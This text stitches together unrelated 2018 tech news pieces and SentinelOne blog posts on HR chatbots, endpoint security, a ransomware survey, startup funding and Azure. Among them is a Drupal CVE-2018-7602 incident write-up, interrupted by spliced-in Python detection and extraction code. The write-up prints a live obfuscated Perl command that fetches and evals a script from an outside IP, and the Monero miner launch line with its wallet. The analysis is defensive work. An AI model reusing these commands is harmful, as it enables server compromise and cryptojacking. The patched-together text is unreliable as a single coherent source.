Leena AI builds HR chatbots to answer policy questions automatically

Say you have a job with a large company and you want to know how much vacation time you have left, or how to add your new baby to your healthcare. This usually involves emailing or calling HR and waiting for an answer, or it could even involve crossing multiple systems to get what you need.

Leena AI, a member of the Y Combinator Summer 2018 class, wants to change that by building HR bots to answer questions for employees instantly.

The bots can be integrated into Slack or Workplace by Facebook and they are built and trained using information in policy documents and by pulling data from various back-end systems like Oracle and SAP.

Adit Jain, co-founder at Leena AI, says the company has its roots in another startup called Chatteron, which the founders started after they got out of college in India in 2015. That product helped people build their own chatbots. Jain says along the way, they discovered while doing their market research a particularly strong need in HR. They started Leena AI last year to address that specific requirement.

Jain says when building bots, the team learned through its experience with Chatteron that it’s better to concentrate on a single subject because the underlying machine learning model gets better the more it’s used. “Once you create a bot, for it to really add value and be [extremely] accurate, and for it to really go deep, it takes a lot of time and effort and that can only happen through verticalization,” Jain explained.

Photo: Leena AI

What’s more, as the founders have become more knowledgeable about the needs of HR, they have learned that 80 percent of the questions cover similar topics, like vacation, sick time and expense reporting. They have also seen companies using similar back-end systems, so they can now build standard integrators for common applications like SAP, Oracle and NetSuite.

Of course, even though people may ask similar questions, the company may have unique terminology or people may ask the question in an unusual way. Jain says that’s where the natural language processing (NLP) comes in. The system can learn these variations over time as they build a larger database of possible queries.

The company just launched in 2017 and already has a dozen paying customers. They hope to double that number in just 60 days. Jain believes being part of Y Combinator should help in that regard. The partners are helping the team refine its pitch and making introductions to companies that could make use of this tool.

Their ultimate goal is nothing less than to be ubiquitous, to help bridge multiple legacy systems to provide answers seamlessly for employees to all their questions. If they can achieve that, they should be a successful company.

5 Shortcuts to Speed Up Your Endpoint Security Management Process

As a SecOps professional, you likely spend a good chunk of the day managing your endpoint assets and ensuring they are secured. We understand the challenge. Managing endpoint security can be a time-consuming process. So we’re here to help!
In this post, I’ll be sharing some ways you can save time while managing your endpoints using SentinelOne.

1. Prevent Cyber Threats

There are numerous endpoint solutions on the market; many rely on cloud connectivity, some are based on reputation or similarities. For SentinelOne, all of the intelligence of our AI models is baked into a low footprint agent that automatically quarantines and mitigates malicious activity on the endpoint. The result? Users can continue working securely and uninterrupted, even if malware tries to compromise their devices.

2. Rollback and Remediate Threats

“1st layer” or pre-execution technologies might miss malware and ransomware, like file-less attempts. What then? Legacy and most next-gen products cannot answer this question. Sadly, you won’t know until your users report problems, and you will need to quickly come up with a recovery plan to remediate. With SentinelOne, you are always just one click away from rolling back the impact, saving time by allowing users to complete their tasks without interruption.

3. Simplified management experience

In the early days of endpoint protection, many products implemented the concept of zones. The idea behind zones is to allow SecOps to configure different policies based on location. In the case of malware and ransomware, this is simpler – they are not wanted regardless of your location. By deploying the SentinelOne agent across your endpoint assets, you don’t need to worry about additional complexity based on your workforce location.

4. Visibility on all assets

Once SentinelOne is deployed across your assets, each agent automatically reports on all installed applications – for Windows, MacOS, and Linux endpoints. Unlike other products, this functionality is not dependent on ever running the actual application. From the SentinelOne console, you can schedule a risk and vulnerability report that will be emailed to recipients of your choice with executive-level insights. The report gives access to a complete list of agents and their relevant CVEs, so you can implement a real-time patch management program.

5. Automation and Orchestration

Cybercriminals are embracing automated attacks like never before. This gives them the ability to process more data in less time, jumping from database to database or network to network with relative ease. If enterprises try to eliminate threats using manual processes or ad hoc hunts, they are at a severe disadvantage. SentinelOne products were built with an API-first approach, so anything our technology does in isolation can also be orchestrated and integrated, creating unified and proactive workflows with your other security tools.

Bonus

Over to You: Does Your Endpoint Protection Platform Help You SAVE Time?

There are many more than these five ways that SentinelOne saves you time, but for this post, we’ve selected a few helpful tips. Time equals money; we have customers from all industries and sizes who are experiencing for themselves the power of our single EPP/EDR agent, and its many benefits beyond endpoint protection. We were also recognized by NSS Labs as one of the leading ROI products.

Ready for a test drive? A stronger security posture can be easy to implement and manage. Let us show you today.

The post 5 Shortcuts to Speed Up Your Endpoint Security Management Process appeared first on SentinelOne.

Facebook is using machine learning to self-tune its myriad of services

Regardless of what you may think of Facebook as a platform, they run a massive operation and when you reach their level of scale you have to get more creative in how you handle every aspect of your computing environment.

Engineers quickly reach the limits of human ability to track information to the point that checking logs and analytics becomes impractical and unwieldy on a system running thousands of services. This is a perfect scenario to implement machine learning and that is precisely what Facebook has done.

The company published a blog post today about a self-tuning system they have dubbed Spiral. This is pretty nifty and what it does is essentially flip the idea of system tuning on its head. Instead of looking at some data and coding what you want the system to do, you teach the system the right way to do it and it does it for you, using the massive stream of data to continually teach the machine learning models how to push the systems to be ever better.

In the blog post, the Spiral team described it this way: “Instead of looking at charts and logs produced by the system to verify correct and efficient operation, engineers now express what it means for a system to operate correctly and efficiently in code. Today, rather than specify how to compute correct responses to requests, our engineers encode the means of providing feedback to a self-tuning system.”

They say that coding in this way is akin to declarative code, like using SQL statements to tell the database what you want it to do with the data, but the act of applying that concept to systems is not a simple matter.

“Spiral uses machine learning to create data-driven and reactive heuristics for resource-constrained real-time services. The system allows for much faster development and hands-free maintenance of those services, compared with the hand-coded alternative,” the Spiral team wrote in the blog post.

If you consider the sheer number of services running on Facebook, and the number of users trying to interact with those services at any given time, it required sophisticated automation, and that is what Spiral is providing.

The system takes the log data and processes it through Spiral, which is connected with just a few lines of code. It then sends commands back to the server based on the declarative coding statements written by the team. To ensure those commands are always being fine-tuned, the data is at the same time sent from the server to a model for further adjustment, in a lovely virtuous cycle. This process can be applied locally or globally.

The tool was developed by the team operating in Boston, and is only available internally inside Facebook. It took lots of engineering to make it happen, the kind of scope that only Facebook could apply to a problem like this (mostly because Facebook is one of the few companies that would actually have a problem like this).

Ransomware Awareness and Employee Training Programs are Becoming Board Level Priorities

During our first release of findings from the SentinelOne Global Ransomware Report 2018, we highlighted key findings as to why organizations felt they were the victim of a ransomware attack, how confident they are in defending against future attacks, and why.

With 53% of U.S. respondents blaming legacy AV for failed ransomware defense and 68% of this group feeling confident in defending against future attacks due to the replacement of legacy AV with next-gen protection, the necessity of advanced technology in modern defense was plain to see.

We now are releasing our second wave of findings from the survey, focusing on increased board level involvement in organizational defense, the increased sophistication of attacks and payment demands, and the desire for enhanced law enforcement efforts.

Organizational Security is a Top Board Level Priority

With more than half (56%) of U.S. organizations indicating they are implementing employee training and awareness programs at the board level, findings show the necessity of increased board level awareness and involvement for effective organizational security:

  • 37% of board members responded that their general attack concern level has increased.
  • 49% of boards at U.S. companies are increasing security budgets to thwart ransomware attacks.
  • 38% of board respondents are more frequently getting involved at the ground level with implementation of security processes, policies and protocols.

Cyber Criminals are Evolving with More Effective Attacks and Payment Demands

Findings provide strong evidence that cyber criminals are improving their craft by infecting organizations with faster spreading, more sophisticated and highly debilitating ransomware attacks, and are also requesting evolved payment methods to mitigate legal risk:

  • 42% of respondents recognized a faster speed of ransomware infection.
  • 43% noted a greater scale of infection – citing lateral movement across networks, not simply isolated to the endpoint.
  • 33% feel ransomware attacks have become more targeted vs. opportunistic.
  • 53% indicated attackers are demanding payments in the form of cryptocurrencies.

Companies Desire Tougher Stance from the Law Against Cyber Criminals

The research also reveals that the majority of IT Security professionals would like to see more resources for law enforcement agencies to track down cyber criminals, to protect organizations and citizens against ransomware attacks:

  • 70% of U.S. companies desire greater resources for law enforcement agencies to track down cyber criminals.
  • 57% of respondents feel laws need to catch up to modern cyber-crime activity, and impose tougher sentences on criminals.
  • There is also desire for greater international cooperation between countries, expressed by 58% of respondents.

These findings, coupled with initial findings, clearly show that although next-gen technology is paramount in defending against modern attacks, there also needs to be a shift in the organization’s frame of mind. In today’s hostile threat landscape, cyber security needs to be a top priority for every member of an organization, from board and C-level down to individual employees.

The post Ransomware Awareness and Employee Training Programs are Becoming Board Level Priorities appeared first on SentinelOne.

IQ Capital is raising £125M to invest in deep tech startups in the UK

The rapid pace of technology innovation and applications in recent decades — you could argue that just about every kind of business is a “tech” business these days — has spawned a sea of tech startups and larger businesses that are focused on serving that market, and equally demanding consumers, on a daily basis. Today, a venture capital firm in the UK is announcing a fund aimed at helping to grow the technologies that will underpin a lot of those daily applications.

Cambridge-based IQ Capital is raising £125 million ($165 million) that it will use specifically to back UK startups that are building “deep tech” — the layer of research and development, and potentially commercialised technology, that is considered foundational to how a lot of technology will work in the years and decades to come. So far, some £92 million has been secured, and partner Kerry Baldwin said that the rest is coming “without question” — pointing to strong demand.

There was a time when it was more challenging to raise money for very early stage companies working at the cusp of new technologies, even more so in smaller tech ecosystems like the UK’s. As Ed Stacey, another partner in the firm acknowledges, there is often a very high risk of failure at even more stages of the process, with the tech in some cases not even fully developed, let alone rolled out to see what kind of commercial interest there might be in the product.

However, there has been a clear shift in the last several years.

There is a lot more money floating around in tech these days — so much so that it’s created a stronger demand for projects to invest in. (Another consequence of that is that when you do get a promising startup, funds are potentially giving them hundreds of millions and causing other disruptions in how they grow and exit, which is another story…)

And while there are definitely a lot of startups out there in the world today, a lot of them are what you might describe as “me too”, or at least making something that is easily replicated by another startup, making the returns and the wins harder to find among them.

A new focus that we are seeing on “deep tech” is a consequence of both of those trends.

“The low-hanging fruit has been discovered… Shallow tech is a solved problem,” Stacey said, in reference to areas like the basics of e-commerce services and mobile apps. “These are easy to build with open source components, for example. It’s shallow when it can be copied very quickly.”

In contrast, deep tech “by definition is something that can’t easily be copied,” he continued. “The underlying algorithm is deep, with computational complexity.”

But the challenges run deep in deep tech: not only might a product or technology never come together, or find a customer, but it might face problems scaling if it does take off. IQ Capital’s focus on deep tech is coupled with the company trying to determine which ideas will scale, not just work or find a customer. As we see more deep tech companies emerging and growing, I’m guessing scalability will become an ever more prominent factor in deciding whether a startup gets backing.

IQ Capital’s investments to date span areas like security (Privitar), marketing tech (Grapeshot, which was acquired by Oracle earlier this year), AI (such as speech recognition API developer Speechmatics) and biotechnology (Fluidic Analytics, which measures protein concentrations), all areas that will be the focus of this fund, along with IoT and other emerging technologies and gaps in the current market.

IQ Capital is not the only fund starting to focus on deep tech, nor is its portfolio the only range of startups focusing on this (Allegro.AI and deep-learning chipmaker Hailo are others, to name just two).

LPs in this latest fund include family offices, wealth managers, tech entrepreneurs and CEOs from IQ’s previous investments, as well as British Business Investments, the commercial arm of the British Business Bank, the firm said.

Intermix.io looks to help data engineers find their worst bottlenecks

For any company built on top of machine learning operations, the more data it has, the better it is off — as long as it can keep it all under control. But as more and more information pours in from disparate sources, gets logged in obscure databases and is generally hard (or slow) to query, the process of getting that all into one neat place where a data scientist can actually start running the statistics is quickly running into one of machine learning’s biggest bottlenecks.

That’s a problem Intermix.io and its founders, Paul Lappas and Lars Kamp, hope to solve. Engineers get a granular look at all of the different nuances behind what’s happening with some specific function, from the query all the way through all of the paths it’s taking to get to its end result. The end product is one that helps data engineers monitor the flow of information going through their systems, regardless of the source, to isolate bottlenecks early and see where processes are breaking down. The company also said it has raised seed funding from Uncork Capital, S28 Capital, PAUA Ventures along with Bastian Lehman, CEO of Postmates and Hasso Plattner, founder of SAP.

“Companies realize being data driven is a key to success,” Kamp said. “The cloud makes it cheap and easy to store your data forever, machine learning libraries are making things easy to digest. But a company that wants to be data driven wants to hire a data scientist. This is the wrong first hire. To do that they need access to all the relevant data, and have it be complete and clean. That falls to data engineers who need to build data assembly lines where they are creating meaningful types to get data usable to the data scientist. That’s who we serve.”

Intermix.io works in a couple of ways: First, it tags all of that data, giving the service a meta-layer of understanding what does what, and where it goes; second, it taps every input in order to gather metrics on performance and help identify those potential bottlenecks; and lastly, it’s able to track that performance all the way from the query to the thing that ends up on a dashboard somewhere. The idea here is that if, say, some server is about to run out of space somewhere or is showing some performance degradation, that’s going to start showing up in the performance of the actual operations pretty quickly — and needs to be addressed.

All of this is an efficiency play that might not seem to make sense at a smaller scale. With the waterfall of new devices that come online every day, as well as more and more ways of understanding how people use tools online, even the smallest companies can quickly start building massive data sets. And if that company’s business depends on some machine learning happening in the background, that means it’s dependent on all that training and tracking happening as quickly and smoothly as possible, with any hiccups leading to real repercussions for its own business.

Intermix.io isn’t the first company to try to create some application performance management software. There are others like Data Dog and New Relic, though Lappas says that the primary competition from them comes in the form of traditional APM software with some additional scripts tacked on. However, data flows are a different layer altogether, which means they require a more unique and custom approach to addressing that problem.

Microsoft launches two new Azure regions in China

Microsoft today launched two new Azure regions in China. These new regions, China North 2 in Beijing and China East 2 in Shanghai, are now generally available and will complement the existing two regions Microsoft operates in the country (with the help of its local partner, 21Vianet).

As the first international cloud provider in China when it launched its first region there in 2014, Microsoft has seen rapid growth in the region and there is clearly demand for its services there. Unsurprisingly, many of Microsoft’s customers in China are other multinationals that are already betting on Azure for their cloud strategy. These include the likes of Adobe, Coke, Costco, Daimler, Ford, Nuance, P&G, Toyota and BMW.

In addition to the new China regions, Microsoft also today launched a new availability zone for its region in the Netherlands. While availability zones have long been standard among the big cloud providers, Azure only launched this feature — which divides a region into multiple independent zones — into general availability earlier this year. The regions in the Netherlands, Paris and Iowa now offer this additional safeguard against downtime, with others to follow soon.

In other Azure news, Microsoft also today announced that Azure IoT Edge is now generally available. In addition, Microsoft announced the second generation of its Azure Data Lake Storage service, which is now in preview, and some updates to the Azure Data Factory, which now includes a web-based user interface for building and managing data pipelines.

Drupal Exploit on Linux – SentinelOne Detection and Response Case Study

Introduction

SentinelOne Vigilance is a managed service provided by a group of highly trained cyber security analysts. It offers another layer of security to IT teams by accelerating the detection, prioritization, and response to advanced cyber threats and reducing the risk that a critical alert goes unnoticed. The Vigilance analysts assess the suspicious alerts, review raw threat data, process operations, and network connections, and analyze samples, as needed. They also correlate the information with threat intelligence feeds, analyze low-level log data, and collaborate with security researchers to identify and prioritize events. Quite often the group investigates interesting cases. A recent Vigilance case is the subject of this article.

Recently, SentinelOne was called in by a partner to assist a company in analyzing an attack that was still going on. They knew that they were compromised in some way, and that they were still under attack, but they didn’t know much more than that. At this stage, the findings included some Linux servers showing weird CPU utilization and some Perl scripts running. So for the first step, we suggested that they install our SentinelOne agent on the Linux servers, and at the same time, involve our Vigilance team to analyze the samples, uncover the details behind the attack, and suggest a method to disinfect the systems.

Detection and Response

Once installed, the agent successfully detected the threat in no time. This Linux machine was infected by an exploit of the Drupal vulnerability (CVE-2018-7602), which resulted in running a shell command line. The command line downloads a Perl script from a remote server and executes it. The agent detected this command line as malicious due to its structure and behavior.

Figure 1. – Perl script is detected as a threat

On the infected machine, we observed a large number of Perl scripts running with the monero7 parameter.

Figure 2. – Multitude of cryptominers running on an infected Linux machine

From the logs, we can see the syntax that was used:

sh -c p$(printf e)rl -e 'BEGIN{$0=$$};use IO::Socket::INET;if(my$c=new IO::Socket::INET(PeerAddr=>"147.52.43.159:80")){print $c $_."rn" for (q{GET /sites/z.html HTTP/1.1},q{Host:147.52.43.159},q{User-Agent: Mozilla/5.0},q{});my$x;{local$/=undef;$x=};while($x=~s/(.*)rn//){last if$x=~/^$/;}eval($x);}'

This entry shows that the machine is making a socket connection to ‘147.52.43.159’ using port ’80’ and issuing a ‘GET’ request to ‘/sites/z.html’, which is actually a Perl script. The beginning of the command also discloses this piece of information:

sh -c p$(printf e)rl

While semi-obfuscated, this is simply the shell executing ‘perl’ with the ‘e’ replaced by the output of the sub-command ‘printf e’: sh -c perl. This method is used to hide malicious scripts from string-based detection.
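Detection logic for the split-command-name trick described above, as an added example that is not part of the original case study or the SentinelOne agent: it collapses $(printf X) substitutions back to X before matching, flags a command name that was glued together through such a substitution, and separately flags an inline Perl program that opens a socket and evals what it receives. The sample command lines are constructed for the demo, not taken from the incident logs.

```python
import re

# Constructed sample process command lines (not from the incident logs). The
# first mimics the p$(printf e)rl pattern; the others are benign look-alikes.
SAMPLE_CMDLINES = [
    "sh -c p$(printf e)rl -e 'use IO::Socket::INET;my$x=<$c>;eval($x);'",
    "sh -c perl -e 'print \"hello\\n\"'",
    "sh -c p$(printf e)rl -v",
    "/usr/bin/python3 manage.py migrate",
]

# $(printf X) with X bare, single-quoted or double-quoted.
PRINTF_SUBST = re.compile(
    r"\$\(\s*printf\s+(?:'([^']*)'|\"([^\"]*)\"|([^\s)]+))\s*\)")

# A printf substitution touching non-space text on either side, i.e. spliced
# into the middle of a token such as a command name.
SPLIT_NAME = re.compile(r"\S\$\(\s*printf\b[^)]*\)|\$\(\s*printf\b[^)]*\)\S")

# Indicators evaluated on the de-obfuscated line.
INDICATORS = {
    "perl_inline": re.compile(r"\bperl\s+(?:\S+\s+)*-e\b"),  # perl ... -e
    "perl_socket": re.compile(r"IO::Socket::INET"),
    "perl_eval": re.compile(r"\beval\s*\("),
}


def deobfuscate(cmdline):
    """Replace every $(printf X) substitution with X so that a split command
    name (p$(printf e)rl) reads as perl again. Repeats until nothing is left,
    which also unwinds substitutions produced by an earlier pass."""
    def repl(match):
        return next(g for g in match.groups() if g is not None)
    previous = None
    while previous != cmdline:
        previous, cmdline = cmdline, PRINTF_SUBST.sub(repl, cmdline)
    return cmdline


def analyze(cmdline):
    """Return the normalized line, the indicators that matched and a verdict."""
    clean = deobfuscate(cmdline)
    hits = [name for name, rx in INDICATORS.items() if rx.search(clean)]
    if SPLIT_NAME.search(cmdline):          # only visible on the raw line
        hits.insert(0, "split_command_name")
    # Either the command name was hidden behind a substitution, or the inline
    # Perl program both opens a socket and evals data (a download-and-run).
    suspicious = ("split_command_name" in hits
                  or {"perl_inline", "perl_socket", "perl_eval"} <= set(hits))
    return {"raw": cmdline, "normalized": clean,
            "indicators": hits, "suspicious": suspicious}


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = analyze(line)
        print("SUSPICIOUS" if result["suspicious"] else "ok        ",
              result["indicators"], result["normalized"])
```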

The next step of the investigation is to verify the server is up and get the requested file:

$: curl -I 147.52.43.159/sites/z.html

We know from the logs that ‘z.html’ is executed via Perl, and looking at the file shows it is collapsed into one line of code. Some reformatting is applied to make the code readable:

$: sed -e $'s/;/;\n/g' z.html

This command returns Perl code that is slightly easier to read. While reviewing the code, we spotted a large chunk of hex code, which is the cryptominer:

sub { my $GIg = '1f8b08005848fc5a0003acdc0d90dbc579c7f1bf0ffb2c63b0c54b40256e102e2fe2ad918d038224208c0d0731a0605e0438399d8fb365e21761df611908889497830e54e5551062145288201346a494516886280c655420a00249142099ff50302a3120de8c0003bdf3fed6a06fb430a5dcccf94e1f3f7a76f7d9d5fe753add5e347fc1d13d132678f6631bef706ffcd6e889c6e2f2caf29db7c6c4bd98d73bf66fc8db754bec24cffd71ecf33b757cf5bc...

Fifteen other chunks of hex code were found. They look like objects that the cryptominer loads. Here is a fraction of one of them:

push @M, $_ for ( sub { my @BnM = ('1f8b08005648fc5a0003ed586f6c5b5715bf761cc76912c78ca64dff40bdd14ec9602674a4eaba85c5e9bf97c943a149aa00cdde9eed97d88b63bbcf2f8d1ba00bcb3ad5f25255fb805a01d20412d234c43a4d42ddf6818c942e12420a0ca67c405bb531b0594503152393ba9873efbb27beef364f9dc407f8c0b59e7ff7fcee39f79efbf7dcf79e381839e4...

These chunks look interesting, so we wrote a small Python script to convert the hex strings to binary. After running the extractor, we had 16 binary files. To get the exact file type, we ran this command:

$: for f in {0..15}; do file $f; done

gzip compressed data, last modified: Wed May 16 15:03:50 2018, from Unix

After unzipping the GZIP files, we got the original files. Checking file type again revealed that these are 64-bit ELF files.

ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked
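The extraction and identification steps described above, as an added Python example that is not the analysts' own script: it pulls single-quoted hex literals out of a Perl-like text, decodes them, recognizes the gzip magic that `file` reported, decompresses each chunk, and reads the ELF identification bytes (class, byte order, type, machine) that `file` summarized as "ELF 64-bit LSB shared object, x86-64". The embedded sample script and its payloads are constructed here; nothing comes from the real z.html.

```python
import gzip
import hashlib
import re
import struct

GZIP_MAGIC = b"\x1f\x8b"   # leading bytes of every chunk shown above
ELF_MAGIC = b"\x7fELF"
# Single-quoted hex literals of at least 16 hex digits, like '1f8b08...'.
HEX_LITERAL = re.compile(r"'([0-9a-fA-F]{16,})'")


def build_sample_script():
    """Construct a Perl-like text embedding two gzip'd hex chunks: a fake
    64-bit little-endian x86-64 shared object and a non-ELF blob. This is a
    constructed stand-in for the demo, not the script from the incident."""
    e_ident = ELF_MAGIC + bytes([2, 1, 1]) + b"\x00" * 9  # class=64-bit, data=LSB, version=1
    header = e_ident + struct.pack("<HH", 3, 0x3E)         # e_type=ET_DYN, e_machine=EM_X86_64
    fake_elf = header + b"constructed stand-in for the miner body"
    other = gzip.compress(b"constructed non-ELF object")
    return (f"sub {{ my $GIg = '{gzip.compress(fake_elf).hex()}'; }}\n"
            f"push @M, $_ for ( sub {{ my @BnM = ('{other.hex()}') }} );\n")


def extract_chunks(script_text):
    """Decode every embedded hex literal into bytes (odd-length ones are skipped)."""
    return [bytes.fromhex(h) for h in HEX_LITERAL.findall(script_text)
            if len(h) % 2 == 0]


def classify(blob):
    """Identify one chunk the way `file` did: gzip wrapper first, then the
    ELF header of the decompressed content. Hashes are SHA-1, as in the
    indicator list above."""
    info = {"size": len(blob), "sha1": hashlib.sha1(blob).hexdigest(),
            "gzip": blob.startswith(GZIP_MAGIC), "elf": False}
    if not info["gzip"]:
        return info
    try:
        inner = gzip.decompress(blob)
    except (OSError, EOFError):
        info["error"] = "corrupt gzip stream"
        return info
    info["inner_sha1"] = hashlib.sha1(inner).hexdigest()
    info["inner_size"] = len(inner)
    if len(inner) >= 20 and inner.startswith(ELF_MAGIC):
        info["elf"] = True
        info["class"] = {1: "ELF32", 2: "ELF64"}.get(inner[4], "unknown")
        info["endian"] = {1: "LSB", 2: "MSB"}.get(inner[5], "unknown")
        fmt = "<HH" if inner[5] == 1 else ">HH"
        info["type"], info["machine"] = struct.unpack_from(fmt, inner, 16)
    return info


def analyze_script(script_text):
    """Classify every hex chunk found in the script, in order of appearance."""
    return [classify(blob) for blob in extract_chunks(script_text)]


if __name__ == "__main__":
    for index, result in enumerate(analyze_script(build_sample_script())):
        print(index, result)
```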

The large chunk is confirmed to be a cryptominer. It is also known to VirusTotal. We recommend blacklisting the cryptominer and its zipped version. The other chunks are ELF objects which are loaded at runtime by the Perl script. We recommend blacklisting these ELF objects and their corresponding zipped versions as well.

Here is the full list of hashes of the Perl script, the ELF and the GZIP files. All of them should be entered into a blacklist.

  • 033e78cfb8c9c91e0eeb9174a7c2f551aa27fe71 – Perl script
  • 37faefefead49b36d19894f87233072464fa55df – ELF cryptominer
  • 6b709126f5621ec3b04c12aacc7dd3803acdd6b8 – Zipped version of the cryptominer

These are the ELF objects and their zipped versions:

In runtime, the Perl script runs the cryptominer, while randomizing the server to communicate with, using this code:

exec $HyO "$0", '-o', $oAN[rand @oAN].':'. 80, '-u', '4AY7VG9J4VBTmuUdCMDZsY359wNHyqiQzaPzyDSLAwQheUX5om9tpVj3czoCPte9E5HDj2XbawvEQ5RaMYJjdK7US3mN6wA', '-p', "''", '-r', "''", '--currency', 'monero7';

Here is the list of servers as detailed inside the Perl script:

The resulting command line is exactly what is observed in Figure 2, shown above.

Summary

The attack starts with exploiting the Drupal vulnerability (CVE-2018-7602). The shell command, which is run by the Apache worker, downloads a Perl script disguised as an HTML file and runs it. The Perl script includes 16 hex chunks embedded in it, where the large one is the cryptominer. The others are ELF objects which are loaded at runtime by the Perl script. The script runs the cryptominer while randomizing the target server.

With the SentinelOne agent installed, we were able to stop the attack and remediate the infected machines. With the Vigilance managed service we uncovered the details behind it.

The post Drupal Exploit on Linux – SentinelOne Detection and Response Case Study appeared first on SentinelOne.

Ping Identity acquires stealthy API security startup Elastic Beam

At the Identiverse conference in Boston today, Ping Identity announced that it has acquired Elastic Beam, a pre-Series A startup that uses artificial intelligence to monitor APIs and help understand when they have been compromised.

Ping also announced a new product, PingIntelligence for APIs, based on the Elastic Beam technology. They did not disclose the sale price.

The product itself is a pretty nifty piece of technology. It automatically detects all the API IP addresses and URLs running inside a customer. It then uses artificial intelligence to search for anomalous behavior and report back when it finds it (or it can automatically shut down access depending on how it’s configured).

“APIs are defined either in the API gateway because that facilitates creation or implemented on an application server like node.js. We created a platform that could bring a level of protection to both,” company founder Bernard Harguindeguy told TechCrunch.

It may seem like an odd match for Ping, which after all, is an enterprise identity company, but there are reasonable connections here. Perhaps the biggest is that CEO Andre Durand wants to see his company making increasing use of AI and machine learning for identity security in general. It’s also worth noting that his company has had an API security product in its portfolio for over five years, so it’s not a huge stretch to buy Elastic Beam.

With this purchase, Ping has not only acquired some advanced technology, it has also acqui-hired a team of AI and machine learning experts that could help inject the entire Ping product line with AI and machine learning smarts. “Nobody should be surprised who has been watching that Ping will drive machine learning AI and general intelligence into our identity platform,” Durand said.

Harguindeguy certainly sees the potential here. “I think we can over time bring a high level of monitoring and intelligence to Ping to understand whether an identity may have been used by someone else or being misused somehow,” he said.

Elastic Beam interface. Photo: Elastic Beam website

Harguindeguy will join Ping Identity as Senior Vice President of Intelligence along with his entire team. Neither company would divulge the exact number of employees, but Durand did acknowledge it fell somewhere between the 11 and 50 mentioned in the company's Crunchbase profile. The original team consisted of around 10 according to Harguindeguy, and they have been hiring for some time, so it's fair to say more than 11, but fewer than 50.

Harguindeguy says they were pursued by more than one company (although he wouldn’t say who those other companies were), but he felt that Ping provided a good cultural match for his company and could take them where they wanted to go faster than they could on their own, even with Series A money.

“We realized this is going to be really big. How do we go after the market really strongly really fast? We saw that we could fuse this really fast with Ping and have strong go to market with them,” he said.

Durand acknowledged that Ping, which was itself acquired by Vista Equity Partners for $600 million two years ago, couldn't have made such an acquisition without the backing of a larger firm like this. "There was no chance we could have done either UnboundID (which the company acquired in August 2016) or Elastic Beam on our own. This was purely an artifact of being part of the Vista family portfolio," he said.

PingIntelligence for APIs, the product based on Elastic Beam’s technology, is currently in private preview. It should be generally available some time later this year.

Celonis scores $50M Series B on $1B valuation

In the age of digital transformation, it’s important to understand your business processes and find improvements quickly, but it’s not always easy to do without bringing in expensive consultants to help. Celonis, a New York City enterprise startup, created a sophisticated software solution to help solve this problem, and today it announced a $50 million Series B investment from Accel and 83North on a $1 billion valuation.

It’s not typical for an enterprise startup to have such a lofty valuation so early in its funding cycle, but Celonis is not a typical enterprise startup. It launched in 2011 in Munich with this idea of helping companies understand their processes, which they call process mining.

“Celonis is an intelligent system using logs created by IT systems such as SAP, Salesforce, Oracle and Netsuite, and automatically understands how these processes work and then recommends intelligently how they can be improved,” Celonis CEO and co-founder Alexander Rinke explained.

The software isn’t magic, but helps customers visualize each business process, and then looks at different ways of shifting how and where humans interact with the process or bringing in technology like robotics process automation (RPA) when it makes sense.

Celonis process flow. Photo: Celonis

Rinke says the software doesn't simply find a solution and that's the end of the story. It's a continuous process loop of searching for ways to help customers operate more efficiently. This doesn't have to be a big change, but often involves lots of incremental ones.

"We tell them there are lots of answers. We don't think there is one solution. All these little things don't execute well. We point out these things. Typically we find it's easy to implement," he said.

Screenshot: Celonis

It seems to be working. Customers include the likes of ExxonMobil, 3M, Merck, Lockheed Martin and Uber. Rinke reports deals are often seven figures. The company has grown an astonishing 5,000 percent in the past 4 years and 300 percent in the past year alone. What's more, it has been profitable every year since it started. (How many enterprise startups can say that?)

The company currently has 400 employees, but unlike most Series B investments, they aren’t looking at this money to grow operationally. They wanted to have the money for strategic purposes, so if the opportunity came along to make an acquisition or expand into a new market, they would be in a position to do that.

"I see the funding as a confirmation and commitment, a sign from our investors and an indicator about what we've built and the traction we have. But for us it's more important, and our investors share this, what they really invested in was the future of the company," Rinke said. He sees an ongoing commitment to help his customers as far more important than a billion-dollar valuation.

But that doesn’t hurt either as it moves rapidly forward.